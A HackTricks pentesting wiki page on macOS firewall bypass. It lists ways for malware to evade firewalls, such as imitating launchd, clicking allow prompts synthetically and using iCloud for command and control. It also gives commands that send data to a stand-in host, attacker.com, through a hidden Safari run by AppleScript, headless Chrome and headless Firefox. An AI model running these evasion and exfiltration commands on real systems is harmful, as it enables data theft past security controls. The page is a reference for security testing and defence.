macOS Bypassing Firewalls

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Found techniques

The following techniques were found working in some macOS firewall apps.

Abusing whitelist names

For example calling the malware with names of well known macOS processes like launchd

Synthetic Click

If the firewall ask for permission to the user make the malware click on allow

Use Apple signed binaries

Like curl, but also others like whois

Well known apple domains

The firewall could be allowing connections to well known apple domains such as apple.com or icloud.com. And iCloud could be used as a C2.

Generic Bypass

Some ideas to try to bypass firewalls

Check allowed traffic

Knowing the allowed traffic will help you identify potentially whitelisted domains or which applications are allowed to access them

lsof -i TCP -sTCP:ESTABLISHED

Abusing DNS

DNS resolutions are done via mdnsreponder signed application which will probably vi allowed to contact DNS servers.

https://www.youtube.com/watch?v=UlT5KFTMn2k

Via Browser apps

oascript

tell application "Safari"
    run
    tell application "Finder" to set visible of process "Safari" to false
    make new document
    set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Via processes injections

If you can inject code into a process that is allowed to connect to any server you could bypass the firewall protections:

macOS Process Abuse

References

https://www.youtube.com/watch?v=UlT5KFTMn2k

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousmacOS AppleFS NextmacOS Defensive Apps

Last updated 1 year ago

hashtagFound techniques

hashtagAbusing whitelist names

hashtagSynthetic Click

hashtagUse Apple signed binaries

hashtagWell known apple domains

hashtagGeneric Bypass

hashtagCheck allowed traffic

hashtagAbusing DNS

hashtagVia Browser apps

hashtagVia processes injections

hashtagReferences